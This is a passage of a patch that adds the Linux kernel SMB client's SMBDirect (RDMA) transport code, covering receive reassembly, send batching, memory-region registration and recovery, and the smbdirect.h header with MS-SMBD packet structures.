++			data_offset = le32_to_cpu(data_transfer->data_offset);
++
++			/*
++			 * The upper layer expects RFC1002 length at the
++			 * beginning of the payload. Return it to indicate
++			 * the total length of the packet. This minimizes the
++			 * change to upper layer packet processing logic. This
++			 * will eventually be removed when an intermediate
++			 * transport layer is added
++			 */
++			if (response->first_segment && size == 4) {
++				unsigned int rfc1002_len =
++					data_length + remaining_data_length;
++				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
++				data_read = 4;
++				response->first_segment = false;
++				log_read(INFO, "returning rfc1002 length %d\n",
++					rfc1002_len);
++				goto read_rfc1002_done;
++			}
++
++			to_copy = min_t(int, data_length - offset, to_read);
++			memcpy(
++				buf + data_read,
++				(char *)data_transfer + data_offset + offset,
++				to_copy);
++
++			/* move on to the next buffer? */
++			if (to_copy == data_length - offset) {
++				queue_length--;
++				/*
++				 * No need to lock if we are not at the
++				 * end of the queue
++				 */
++				if (queue_length)
++					list_del(&response->list);
++				else {
++					spin_lock_irq(
++						&info->reassembly_queue_lock);
++					list_del(&response->list);
++					spin_unlock_irq(
++						&info->reassembly_queue_lock);
++				}
++				queue_removed++;
++				info->count_reassembly_queue--;
++				info->count_dequeue_reassembly_queue++;
++				put_receive_buffer(info, response);
++				offset = 0;
++				log_read(INFO, "put_receive_buffer offset=0\n");
++			} else
++				offset += to_copy;
++
++			to_read -= to_copy;
++			data_read += to_copy;
++
++			log_read(INFO, "_get_first_reassembly memcpy %d bytes data_transfer_length-offset=%d after that to_read=%d data_read=%d offset=%d\n",
++				 to_copy, data_length - offset,
++				 to_read, data_read, offset);
++		}
++
++		spin_lock_irq(&info->reassembly_queue_lock);
++		info->reassembly_data_length -= data_read;
++		info->reassembly_queue_length -= queue_removed;
++		spin_unlock_irq(&info->reassembly_queue_lock);
++
++		info->first_entry_offset = offset;
++		log_read(INFO, "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
++			 data_read, info->reassembly_data_length,
++			 info->first_entry_offset);
++read_rfc1002_done:
++		return data_read;
++	}
++
++	log_read(INFO, "wait_event on more data\n");
++	rc = wait_event_interruptible(
++		info->wait_reassembly_queue,
++		info->reassembly_data_length >= size ||
++			info->transport_status != SMBD_CONNECTED);
++	/* Don't return any data if interrupted */
++	if (rc)
++		return rc;
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_read(ERR, "disconnected\n");
++		return -ECONNABORTED;
++	}
++
++	goto again;
++}
++
++/*
++ * Receive a page from receive reassembly queue
++ * page: the page to read data into
++ * to_read: the length of data to read
++ * return value: actual data read
++ */
++static int smbd_recv_page(struct smbd_connection *info,
++		struct page *page, unsigned int page_offset,
++		unsigned int to_read)
++{
++	int ret;
++	char *to_address;
++	void *page_address;
++
++	/* make sure we have the page ready for read */
++	ret = wait_event_interruptible(
++		info->wait_reassembly_queue,
++		info->reassembly_data_length >= to_read ||
++			info->transport_status != SMBD_CONNECTED);
++	if (ret)
++		return ret;
++
++	/* now we can read from reassembly queue and not sleep */
++	page_address = kmap_atomic(page);
++	to_address = (char *) page_address + page_offset;
++
++	log_read(INFO, "reading from page=%p address=%p to_read=%d\n",
++		page, to_address, to_read);
++
++	ret = smbd_recv_buf(info, to_address, to_read);
++	kunmap_atomic(page_address);
++
++	return ret;
++}
++
++/*
++ * Receive data from transport
++ * msg: a msghdr pointing to the buffer, can be ITER_KVEC or ITER_BVEC
++ * return: total bytes read, or 0. SMB Direct will not do partial read.
++ */
++int smbd_recv(struct smbd_connection *info, struct msghdr *msg)
++{
++	char *buf;
++	struct page *page;
++	unsigned int to_read, page_offset;
++	int rc;
++
++	if (iov_iter_rw(&msg->msg_iter) == WRITE) {
++		/* It's a bug in the upper layer to get here */
++		cifs_dbg(VFS, "Invalid msg iter dir %u\n",
++			 iov_iter_rw(&msg->msg_iter));
++		rc = -EINVAL;
++		goto out;
++	}
++
++	switch (iov_iter_type(&msg->msg_iter)) {
++	case ITER_KVEC:
++		buf = msg->msg_iter.kvec->iov_base;
++		to_read = msg->msg_iter.kvec->iov_len;
++		rc = smbd_recv_buf(info, buf, to_read);
++		break;
++
++	case ITER_BVEC:
++		page = msg->msg_iter.bvec->bv_page;
++		page_offset = msg->msg_iter.bvec->bv_offset;
++		to_read = msg->msg_iter.bvec->bv_len;
++		rc = smbd_recv_page(info, page, page_offset, to_read);
++		break;
++
++	default:
++		/* It's a bug in the upper layer to get here */
++		cifs_dbg(VFS, "Invalid msg type %d\n",
++			 iov_iter_type(&msg->msg_iter));
++		rc = -EINVAL;
++	}
++
++out:
++	/* SMBDirect will read it all or nothing */
++	if (rc > 0)
++		msg->msg_iter.count = 0;
++	return rc;
++}
++
++/*
++ * Send data to transport
++ * Each rqst is transported as an SMBDirect payload
++ * rqst: the data to write
++ * return value: 0 on successful write, otherwise error code
++ */
++int smbd_send(struct TCP_Server_Info *server,
++	int num_rqst, struct smb_rqst *rqst_array)
++{
++	struct smbd_connection *info = server->smbd_conn;
++	struct kvec vecs[SMBDIRECT_MAX_SEND_SGE - 1];
++	int nvecs;
++	int size;
++	unsigned int buflen, remaining_data_length;
++	unsigned int offset, remaining_vec_data_length;
++	int start, i, j;
++	int max_iov_size =
++		info->max_send_size - sizeof(struct smbd_data_transfer);
++	struct kvec *iov;
++	int rc;
++	struct smb_rqst *rqst;
++	int rqst_idx;
++
++	if (info->transport_status != SMBD_CONNECTED)
++		return -EAGAIN;
++
++	/*
++	 * Add in the page array if there is one. The caller needs to set
++	 * rq_tailsz to PAGE_SIZE when the buffer has multiple pages and
++	 * ends at page boundary
++	 */
++	remaining_data_length = 0;
++	for (i = 0; i < num_rqst; i++)
++		remaining_data_length += smb_rqst_len(server, &rqst_array[i]);
++
++	if (unlikely(remaining_data_length > info->max_fragmented_send_size)) {
++		/* assertion: payload never exceeds negotiated maximum */
++		log_write(ERR, "payload size %d > max size %d\n",
++			remaining_data_length, info->max_fragmented_send_size);
++		return -EINVAL;
++	}
++
++	log_write(INFO, "num_rqst=%d total length=%u\n",
++			num_rqst, remaining_data_length);
++
++	rqst_idx = 0;
++	do {
++		rqst = &rqst_array[rqst_idx];
++		iov = rqst->rq_iov;
++
++		cifs_dbg(FYI, "Sending smb (RDMA): idx=%d smb_len=%lu\n",
++			rqst_idx, smb_rqst_len(server, rqst));
++		remaining_vec_data_length = 0;
++		for (i = 0; i < rqst->rq_nvec; i++) {
++			remaining_vec_data_length += iov[i].iov_len;
++			dump_smb(iov[i].iov_base, iov[i].iov_len);
++		}
++
++		log_write(INFO, "rqst_idx=%d nvec=%d rqst->rq_npages=%d rq_pagesz=%d rq_tailsz=%d buflen=%lu\n",
++			  rqst_idx, rqst->rq_nvec,
++			  rqst->rq_npages, rqst->rq_pagesz,
++			  rqst->rq_tailsz, smb_rqst_len(server, rqst));
++
++		start = 0;
++		offset = 0;
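++		/*
++		 * Pack this request's iovs into batches of at most
++		 * SMBDIRECT_MAX_SEND_SGE - 1 vectors and max_iov_size
++		 * bytes, splitting an iov across batches when it does not
++		 * fit, and post one SMBD data packet per batch.
++		 */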
++		do {
++			buflen = 0;
++			i = start;
++			j = 0;
++			while (i < rqst->rq_nvec &&
++				j < SMBDIRECT_MAX_SEND_SGE - 1 &&
++				buflen < max_iov_size) {
++
++				vecs[j].iov_base = iov[i].iov_base + offset;
++				if (buflen + iov[i].iov_len > max_iov_size) {
++					vecs[j].iov_len =
++						max_iov_size - iov[i].iov_len;
++					buflen = max_iov_size;
++					offset = vecs[j].iov_len;
++				} else {
++					vecs[j].iov_len =
++						iov[i].iov_len - offset;
++					buflen += vecs[j].iov_len;
++					offset = 0;
++					++i;
++				}
++				++j;
++			}
++
++			remaining_vec_data_length -= buflen;
++			remaining_data_length -= buflen;
++			log_write(INFO, "sending %s iov[%d] from start=%d nvecs=%d remaining_data_length=%d\n",
++					remaining_vec_data_length > 0 ?
++						"partial" : "complete",
++					rqst->rq_nvec, start, j,
++					remaining_data_length);
++
++			start = i;
++			rc = smbd_post_send_data(info, vecs, j, remaining_data_length);
++			if (rc)
++				goto done;
++		} while (remaining_vec_data_length > 0);
++
++		/* now sending pages if there are any */
++		for (i = 0; i < rqst->rq_npages; i++) {
++			rqst_page_get_length(rqst, i, &buflen, &offset);
++			nvecs = (buflen + max_iov_size - 1) / max_iov_size;
++			log_write(INFO, "sending pages buflen=%d nvecs=%d\n",
++				buflen, nvecs);
++			for (j = 0; j < nvecs; j++) {
++				size = min_t(unsigned int, max_iov_size, remaining_data_length);
++				remaining_data_length -= size;
++				log_write(INFO, "sending pages i=%d offset=%d size=%d remaining_data_length=%d\n",
++					  i, j * max_iov_size + offset, size,
++					  remaining_data_length);
++				rc = smbd_post_send_page(
++					info, rqst->rq_pages[i],
++					j*max_iov_size + offset,
++					size, remaining_data_length);
++				if (rc)
++					goto done;
++			}
++		}
++	} while (++rqst_idx < num_rqst);
++
++done:
++	/*
++	 * As an optimization, we don't wait for individual I/O to finish
++	 * before sending the next one.
++	 * Send them all and wait for the pending send count to get to 0,
++	 * which means all the I/Os have gone out and we are good to return
++	 */
++
++	wait_event(info->wait_send_pending,
++		atomic_read(&info->send_pending) == 0);
++
++	return rc;
++}
++
++static void register_mr_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smbd_mr *mr;
++	struct ib_cqe *cqe;
++
++	if (wc->status) {
++		log_rdma_mr(ERR, "status=%d\n", wc->status);
++		cqe = wc->wr_cqe;
++		mr = container_of(cqe, struct smbd_mr, cqe);
++		smbd_disconnect_rdma_connection(mr->conn);
++	}
++}
++
++/*
++ * The work queue function that recovers MRs
++ * We need to call ib_dereg_mr() and ib_alloc_mr() before this MR can be used
++ * again. Both calls are slow, so finish them in a workqueue. This will not
++ * block the I/O path.
++ * There is one workqueue that recovers MRs, so there is no need to lock as the
++ * I/O requests calling smbd_register_mr will never update the links in the
++ * mr_list.
++ */
++static void smbd_mr_recovery_work(struct work_struct *work)
++{
++	struct smbd_connection *info =
++		container_of(work, struct smbd_connection, mr_recovery_work);
++	struct smbd_mr *smbdirect_mr;
++	int rc;
++
++	list_for_each_entry(smbdirect_mr, &info->mr_list, list) {
++		if (smbdirect_mr->state == MR_ERROR) {
++
++			/* recover this MR entry */
++			rc = ib_dereg_mr(smbdirect_mr->mr);
++			if (rc) {
++				log_rdma_mr(ERR,
++					"ib_dereg_mr failed rc=%x\n",
++					rc);
++				smbd_disconnect_rdma_connection(info);
++				continue;
++			}
++
++			smbdirect_mr->mr = ib_alloc_mr(
++				info->pd, info->mr_type,
++				info->max_frmr_depth);
++			if (IS_ERR(smbdirect_mr->mr)) {
++				log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
++					    info->mr_type,
++					    info->max_frmr_depth);
++				smbd_disconnect_rdma_connection(info);
++				continue;
++			}
++		} else
++			/* This MR is being used, don't recover it */
++			continue;
++
++		smbdirect_mr->state = MR_READY;
++
++		/* smbdirect_mr->state is updated by this function
++		 * and is read and updated by I/O issuing CPUs trying
++		 * to get an MR; the call to atomic_inc_return
++		 * implies a memory barrier and guarantees this
++		 * value is updated before waking up any calls to
++		 * get_mr() from the I/O issuing CPUs
++		 */
++		if (atomic_inc_return(&info->mr_ready_count) == 1)
++			wake_up_interruptible(&info->wait_mr);
++	}
++}
++
++static void destroy_mr_list(struct smbd_connection *info)
++{
++	struct smbd_mr *mr, *tmp;
++
++	cancel_work_sync(&info->mr_recovery_work);
++	list_for_each_entry_safe(mr, tmp, &info->mr_list, list) {
++		if (mr->state == MR_INVALIDATED)
++			ib_dma_unmap_sg(info->id->device, mr->sgl,
++				mr->sgl_count, mr->dir);
++		ib_dereg_mr(mr->mr);
++		kfree(mr->sgl);
++		kfree(mr);
++	}
++}
++
++/*
++ * Allocate MRs used for RDMA read/write
++ * The number of MRs will not exceed hardware capability in responder_resources
++ * All MRs are kept in mr_list. The MR can be recovered after it's used
++ * Recovery is done in smbd_mr_recovery_work. The content of list entry changes
++ * as MRs are used and recovered for I/O, but the list links will not change
++ */
++static int allocate_mr_list(struct smbd_connection *info)
++{
++	int i;
++	struct smbd_mr *smbdirect_mr, *tmp;
++
++	INIT_LIST_HEAD(&info->mr_list);
++	init_waitqueue_head(&info->wait_mr);
++	spin_lock_init(&info->mr_list_lock);
++	atomic_set(&info->mr_ready_count, 0);
++	atomic_set(&info->mr_used_count, 0);
++	init_waitqueue_head(&info->wait_for_mr_cleanup);
++	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
++	/* Allocate more MRs (2x) than hardware responder_resources */
++	for (i = 0; i < info->responder_resources * 2; i++) {
++		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
++		if (!smbdirect_mr)
++			goto out;
++		smbdirect_mr->mr = ib_alloc_mr(info->pd, info->mr_type,
++					info->max_frmr_depth);
++		if (IS_ERR(smbdirect_mr->mr)) {
++			log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
++				    info->mr_type, info->max_frmr_depth);
++			goto out;
++		}
++		smbdirect_mr->sgl = kcalloc(
++					info->max_frmr_depth,
++					sizeof(struct scatterlist),
++					GFP_KERNEL);
++		if (!smbdirect_mr->sgl) {
++			log_rdma_mr(ERR, "failed to allocate sgl\n");
++			ib_dereg_mr(smbdirect_mr->mr);
++			goto out;
++		}
++		smbdirect_mr->state = MR_READY;
++		smbdirect_mr->conn = info;
++
++		list_add_tail(&smbdirect_mr->list, &info->mr_list);
++		atomic_inc(&info->mr_ready_count);
++	}
++	return 0;
++
++out:
++	kfree(smbdirect_mr);
++
++	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
++		list_del(&smbdirect_mr->list);
++		ib_dereg_mr(smbdirect_mr->mr);
++		kfree(smbdirect_mr->sgl);
++		kfree(smbdirect_mr);
++	}
++	return -ENOMEM;
++}
++
++/*
++ * Get a MR from mr_list. This function waits until there is at least one
++ * MR available in the list. It may access the list while the
++ * smbd_mr_recovery_work is recovering the MR list. This doesn't need a lock
++ * as they never modify the same places. However, there may be several CPUs
++ * issuing I/O trying to get an MR at the same time; mr_list_lock is used to
++ * protect this situation.
++ */
++static struct smbd_mr *get_mr(struct smbd_connection *info)
++{
++	struct smbd_mr *ret;
++	int rc;
++again:
++	rc = wait_event_interruptible(info->wait_mr,
++		atomic_read(&info->mr_ready_count) ||
++		info->transport_status != SMBD_CONNECTED);
++	if (rc) {
++		log_rdma_mr(ERR, "wait_event_interruptible rc=%x\n", rc);
++		return NULL;
++	}
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_rdma_mr(ERR, "info->transport_status=%x\n",
++			info->transport_status);
++		return NULL;
++	}
++
++	spin_lock(&info->mr_list_lock);
++	list_for_each_entry(ret, &info->mr_list, list) {
++		if (ret->state == MR_READY) {
++			ret->state = MR_REGISTERED;
++			spin_unlock(&info->mr_list_lock);
++			atomic_dec(&info->mr_ready_count);
++			atomic_inc(&info->mr_used_count);
++			return ret;
++		}
++	}
++
++	spin_unlock(&info->mr_list_lock);
++	/*
++	 * It is possible that we could fail to get an MR because other
++	 * processes may try to acquire an MR at the same time. If this is
++	 * the case, retry it.
++	 */
++	goto again;
++}
++
++/*
++ * Register memory for RDMA read/write
++ * pages[]: the list of pages to register memory with
++ * num_pages: the number of pages to register
++ * tailsz: if non-zero, the bytes to register in the last page
++ * writing: true if this is a RDMA write (SMB read), false for RDMA read
++ * need_invalidate: true if this MR needs to be locally invalidated after I/O
++ * return value: the MR registered, NULL if failed.
++ */
++struct smbd_mr *smbd_register_mr(
++	struct smbd_connection *info, struct page *pages[], int num_pages,
++	int offset, int tailsz, bool writing, bool need_invalidate)
++{
++	struct smbd_mr *smbdirect_mr;
++	int rc, i;
++	enum dma_data_direction dir;
++	struct ib_reg_wr *reg_wr;
++
++	if (num_pages > info->max_frmr_depth) {
++		log_rdma_mr(ERR, "num_pages=%d max_frmr_depth=%d\n",
++			num_pages, info->max_frmr_depth);
++		return NULL;
++	}
++
++	smbdirect_mr = get_mr(info);
++	if (!smbdirect_mr) {
++		log_rdma_mr(ERR, "get_mr returning NULL\n");
++		return NULL;
++	}
++	smbdirect_mr->need_invalidate = need_invalidate;
++	smbdirect_mr->sgl_count = num_pages;
++	sg_init_table(smbdirect_mr->sgl, num_pages);
++
++	log_rdma_mr(INFO, "num_pages=0x%x offset=0x%x tailsz=0x%x\n",
++			num_pages, offset, tailsz);
++
++	if (num_pages == 1) {
++		sg_set_page(&smbdirect_mr->sgl[0], pages[0], tailsz, offset);
++		goto skip_multiple_pages;
++	}
++
++	/* We have at least two pages to register */
++	sg_set_page(
++		&smbdirect_mr->sgl[0], pages[0], PAGE_SIZE - offset, offset);
++	i = 1;
++	while (i < num_pages - 1) {
++		sg_set_page(&smbdirect_mr->sgl[i], pages[i], PAGE_SIZE, 0);
++		i++;
++	}
++	sg_set_page(&smbdirect_mr->sgl[i], pages[i],
++		tailsz ? tailsz : PAGE_SIZE, 0);
++
++skip_multiple_pages:
++	dir = writing ? DMA_FROM_DEVICE : DMA_TO_DEVICE;
++	smbdirect_mr->dir = dir;
++	rc = ib_dma_map_sg(info->id->device, smbdirect_mr->sgl, num_pages, dir);
++	if (!rc) {
++		log_rdma_mr(ERR, "ib_dma_map_sg num_pages=%x dir=%x rc=%x\n",
++			num_pages, dir, rc);
++		goto dma_map_error;
++	}
++
++	rc = ib_map_mr_sg(smbdirect_mr->mr, smbdirect_mr->sgl, num_pages,
++		NULL, PAGE_SIZE);
++	if (rc != num_pages) {
++		log_rdma_mr(ERR,
++			"ib_map_mr_sg failed rc = %d num_pages = %x\n",
++			rc, num_pages);
++		goto map_mr_error;
++	}
++
++	ib_update_fast_reg_key(smbdirect_mr->mr,
++		ib_inc_rkey(smbdirect_mr->mr->rkey));
++	reg_wr = &smbdirect_mr->wr;
++	reg_wr->wr.opcode = IB_WR_REG_MR;
++	smbdirect_mr->cqe.done = register_mr_done;
++	reg_wr->wr.wr_cqe = &smbdirect_mr->cqe;
++	reg_wr->wr.num_sge = 0;
++	reg_wr->wr.send_flags = IB_SEND_SIGNALED;
++	reg_wr->mr = smbdirect_mr->mr;
++	reg_wr->key = smbdirect_mr->mr->rkey;
++	reg_wr->access = writing ?
++			IB_ACCESS_REMOTE_WRITE | IB_ACCESS_LOCAL_WRITE :
++			IB_ACCESS_REMOTE_READ;
++
++	/*
++	 * There is no need to wait for completion of ib_post_send
++	 * on IB_WR_REG_MR. Hardware enforces a barrier and order of execution
++	 * on the next ib_post_send when we actually send I/O to the remote peer
++	 */
++	rc = ib_post_send(info->id->qp, &reg_wr->wr, NULL);
++	if (!rc)
++		return smbdirect_mr;
++
++	log_rdma_mr(ERR, "ib_post_send failed rc=%x reg_wr->key=%x\n",
++		rc, reg_wr->key);
++
++	/* If all failed, attempt to recover this MR by setting it to MR_ERROR */
++map_mr_error:
++	ib_dma_unmap_sg(info->id->device, smbdirect_mr->sgl,
++		smbdirect_mr->sgl_count, smbdirect_mr->dir);
++
++dma_map_error:
++	smbdirect_mr->state = MR_ERROR;
++	if (atomic_dec_and_test(&info->mr_used_count))
++		wake_up(&info->wait_for_mr_cleanup);
++
++	smbd_disconnect_rdma_connection(info);
++
++	return NULL;
++}
++
++static void local_inv_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smbd_mr *smbdirect_mr;
++	struct ib_cqe *cqe;
++
++	cqe = wc->wr_cqe;
++	smbdirect_mr = container_of(cqe, struct smbd_mr, cqe);
++	smbdirect_mr->state = MR_INVALIDATED;
++	if (wc->status != IB_WC_SUCCESS) {
++		log_rdma_mr(ERR, "invalidate failed status=%x\n", wc->status);
++		smbdirect_mr->state = MR_ERROR;
++	}
++	complete(&smbdirect_mr->invalidate_done);
++}
++
++/*
++ * Deregister an MR after I/O is done
++ * This function may wait if remote invalidation is not used
++ * and we have to locally invalidate the buffer to prevent data from being
++ * modified by the remote peer after the upper layer consumes it
++ */
++int smbd_deregister_mr(struct smbd_mr *smbdirect_mr)
++{
++	struct ib_send_wr *wr;
++	struct smbd_connection *info = smbdirect_mr->conn;
++	int rc = 0;
++
++	if (smbdirect_mr->need_invalidate) {
++		/* Need to finish local invalidation before returning */
++		wr = &smbdirect_mr->inv_wr;
++		wr->opcode = IB_WR_LOCAL_INV;
++		smbdirect_mr->cqe.done = local_inv_done;
++		wr->wr_cqe = &smbdirect_mr->cqe;
++		wr->num_sge = 0;
++		wr->ex.invalidate_rkey = smbdirect_mr->mr->rkey;
++		wr->send_flags = IB_SEND_SIGNALED;
++
++		init_completion(&smbdirect_mr->invalidate_done);
++		rc = ib_post_send(info->id->qp, wr, NULL);
++		if (rc) {
++			log_rdma_mr(ERR, "ib_post_send failed rc=%x\n", rc);
++			smbd_disconnect_rdma_connection(info);
++			goto done;
++		}
++		wait_for_completion(&smbdirect_mr->invalidate_done);
++		smbdirect_mr->need_invalidate = false;
++	} else
++		/*
++		 * For remote invalidation, just set it to MR_INVALIDATED
++		 * and defer to mr_recovery_work to recover the MR for next use
++		 */
++		smbdirect_mr->state = MR_INVALIDATED;
++
++	if (smbdirect_mr->state == MR_INVALIDATED) {
++		ib_dma_unmap_sg(
++			info->id->device, smbdirect_mr->sgl,
++			smbdirect_mr->sgl_count,
++			smbdirect_mr->dir);
++		smbdirect_mr->state = MR_READY;
++		if (atomic_inc_return(&info->mr_ready_count) == 1)
++			wake_up_interruptible(&info->wait_mr);
++	} else
++		/*
++		 * Schedule the work to do MR recovery for future I/Os; MR
++		 * recovery is slow and we don't want it to block the current I/O
++		 */
++		queue_work(info->workqueue, &info->mr_recovery_work);
++
++done:
++	if (atomic_dec_and_test(&info->mr_used_count))
++		wake_up(&info->wait_for_mr_cleanup);
++
++	return rc;
++}
+diff --git a/fs/smb/client/smbdirect.h b/fs/smb/client/smbdirect.h
+new file mode 100644
+index 0000000000000..207ef979cd51c
+--- /dev/null
++++ b/fs/smb/client/smbdirect.h
+@@ -0,0 +1,320 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *
++ *   Author(s): Long Li <longli@microsoft.com>
++ */
++#ifndef _SMBDIRECT_H
++#define _SMBDIRECT_H
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++#define cifs_rdma_enabled(server)	((server)->rdma)
++
++#include "cifsglob.h"
++#include <rdma/ib_verbs.h>
++#include <rdma/rdma_cm.h>
++#include <linux/mempool.h>
++
++extern int rdma_readwrite_threshold;
++extern int smbd_max_frmr_depth;
++extern int smbd_keep_alive_interval;
++extern int smbd_max_receive_size;
++extern int smbd_max_fragmented_recv_size;
++extern int smbd_max_send_size;
++extern int smbd_send_credit_target;
++extern int smbd_receive_credit_max;
++
++enum keep_alive_status {
++	KEEP_ALIVE_NONE,
++	KEEP_ALIVE_PENDING,
++	KEEP_ALIVE_SENT,
++};
++
++enum smbd_connection_status {
++	SMBD_CREATED,
++	SMBD_CONNECTING,
++	SMBD_CONNECTED,
++	SMBD_NEGOTIATE_FAILED,
++	SMBD_DISCONNECTING,
++	SMBD_DISCONNECTED,
++	SMBD_DESTROYED
++};
++
++/*
++ * The context for the SMBDirect transport
++ * Everything related to the transport is here. It has several logical parts
++ * 1. RDMA related structures
++ * 2. SMBDirect connection parameters
++ * 3. Memory registrations
++ * 4. Receive and reassembly queues for data receive path
++ * 5. mempools for allocating packets
++ */
++struct smbd_connection {
++	enum smbd_connection_status transport_status;
++
++	/* RDMA related */
++	struct rdma_cm_id *id;
++	struct ib_qp_init_attr qp_attr;
++	struct ib_pd *pd;
++	struct ib_cq *send_cq, *recv_cq;
++	struct ib_device_attr dev_attr;
++	int ri_rc;
++	struct completion ri_done;
++	wait_queue_head_t conn_wait;
++	wait_queue_head_t disconn_wait;
++
++	struct completion negotiate_completion;
++	bool negotiate_done;
++
++	struct work_struct disconnect_work;
++	struct work_struct post_send_credits_work;
++
++	spinlock_t lock_new_credits_offered;
++	int new_credits_offered;
++
++	/* Connection parameters defined in [MS-SMBD] 3.1.1.1 */
++	int receive_credit_max;
++	int send_credit_target;
++	int max_send_size;
++	int max_fragmented_recv_size;
++	int max_fragmented_send_size;
++	int max_receive_size;
++	int keep_alive_interval;
++	int max_readwrite_size;
++	enum keep_alive_status keep_alive_requested;
++	int protocol;
++	atomic_t send_credits;
++	atomic_t receive_credits;
++	int receive_credit_target;
++	int fragment_reassembly_remaining;
++
++	/* Memory registrations */
++	/* Maximum number of RDMA read/write outstanding on this connection */
++	int responder_resources;
++	/* Maximum number of pages in a single RDMA write/read on this connection */
++	int max_frmr_depth;
++	/*
++	 * If payload is less than or equal to the threshold,
++	 * use RDMA send/recv to send upper layer I/O.
++	 * If payload is more than the threshold,
++	 * use RDMA read/write through memory registration for I/O.
++	 */
++	int rdma_readwrite_threshold;
++	enum ib_mr_type mr_type;
++	struct list_head mr_list;
++	spinlock_t mr_list_lock;
++	/* The number of available MRs ready for memory registration */
++	atomic_t mr_ready_count;
++	atomic_t mr_used_count;
++	wait_queue_head_t wait_mr;
++	struct work_struct mr_recovery_work;
++	/* Used by transport to wait until all MRs are returned */
++	wait_queue_head_t wait_for_mr_cleanup;
++
++	/* Activity accounting */
++	atomic_t send_pending;
++	wait_queue_head_t wait_send_pending;
++	wait_queue_head_t wait_post_send;
++
++	/* Receive queue */
++	struct list_head receive_queue;
++	int count_receive_queue;
++	spinlock_t receive_queue_lock;
++
++	struct list_head empty_packet_queue;
++	int count_empty_packet_queue;
++	spinlock_t empty_packet_queue_lock;
++
++	wait_queue_head_t wait_receive_queues;
++
++	/* Reassembly queue */
++	struct list_head reassembly_queue;
++	spinlock_t reassembly_queue_lock;
++	wait_queue_head_t wait_reassembly_queue;
++
++	/* total data length of reassembly queue */
++	int reassembly_data_length;
++	int reassembly_queue_length;
++	/* the offset to first buffer in reassembly queue */
++	int first_entry_offset;
++
++	bool send_immediate;
++
++	wait_queue_head_t wait_send_queue;
++
++	/*
++	 * Indicate if we have received a full packet on the connection
++	 * This is used to identify the first SMBD packet of an assembled
++	 * payload (SMB packet) in the reassembly queue so we can return a
++	 * RFC1002 length to upper layer to indicate the length of the SMB
++	 * packet received
++	 */
++	bool full_packet_received;
++
++	struct workqueue_struct *workqueue;
++	struct delayed_work idle_timer_work;
++
++	/* Memory pool for preallocating buffers */
++	/* request pool for RDMA send */
++	struct kmem_cache *request_cache;
++	mempool_t *request_mempool;
++
++	/* response pool for RDMA receive */
++	struct kmem_cache *response_cache;
++	mempool_t *response_mempool;
++
++	/* for debug purposes */
++	unsigned int count_get_receive_buffer;
++	unsigned int count_put_receive_buffer;
++	unsigned int count_reassembly_queue;
++	unsigned int count_enqueue_reassembly_queue;
++	unsigned int count_dequeue_reassembly_queue;
++	unsigned int count_send_empty;
++};
++
++enum smbd_message_type {
++	SMBD_NEGOTIATE_RESP,
++	SMBD_TRANSFER_DATA,
++};
++
++#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
++
++/* SMBD negotiation request packet [MS-SMBD] 2.2.1 */
++struct smbd_negotiate_req {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++/* SMBD negotiation response packet [MS-SMBD] 2.2.2 */
++struct smbd_negotiate_resp {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 negotiated_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le32 status;
++	__le32 max_readwrite_size;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++/* SMBD data transfer packet with payload [MS-SMBD] 2.2.3 */
++struct smbd_data_transfer {
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le16 flags;
++	__le16 reserved;
++	__le32 remaining_data_length;
++	__le32 data_offset;
++	__le32 data_length;
++	__le32 padding;
++	__u8 buffer[];
++} __packed;
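++
++/*
++ * remaining_data_length is the number of payload bytes still to follow in
++ * later packets of the same fragmented message; on the first packet,
++ * data_length + remaining_data_length therefore gives the total message
++ * size (used by smbd_recv_buf() to synthesize the RFC1002 length).
++ */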
++
++/* The packet fields for a registered RDMA buffer */
++struct smbd_buffer_descriptor_v1 {
++	__le64 offset;
++	__le32 token;
++	__le32 length;
++} __packed;
++
++/* Maximum number of SGEs used by smbdirect.c in any send work request */
++#define SMBDIRECT_MAX_SEND_SGE	6
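++/*
++ * One SGE is reserved for the SMBD packet header, leaving at most
++ * SMBDIRECT_MAX_SEND_SGE - 1 entries for payload (see
++ * smbd_post_send_data() in smbdirect.c).
++ */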
++
++/* The context for a SMBD request */
++struct smbd_request {
++	struct smbd_connection *info;
++	struct ib_cqe cqe;
++
++	/* the SGE entries for this work request */
++	struct ib_sge sge[SMBDIRECT_MAX_SEND_SGE];
++	int num_sge;
++
++	/* SMBD packet header follows this structure */
++	u8 packet[];
++};
++
++/* Maximum number of SGEs used by smbdirect.c in any receive work request */
++#define SMBDIRECT_MAX_RECV_SGE	1
++
++/* The context for a SMBD response */
++struct smbd_response {
++	struct smbd_connection *info;
++	struct ib_cqe cqe;
++	struct ib_sge sge;
++
++	enum smbd_message_type type;
++
++	/* Link to receive queue or reassembly queue */
++	struct list_head list;
++
++	/* Indicate if this is the 1st packet of a payload */
++	bool first_segment;
++
++	/* SMBD packet header and payload follows this structure */
++	u8 packet[];
++};
++
++/* Create a SMBDirect session */
++struct smbd_connection *smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr);
++
++/* Reconnect SMBDirect session */
++int smbd_reconnect(struct TCP_Server_Info *server);
++/* Destroy SMBDirect session */
++void smbd_destroy(struct TCP_Server_Info *server);
++
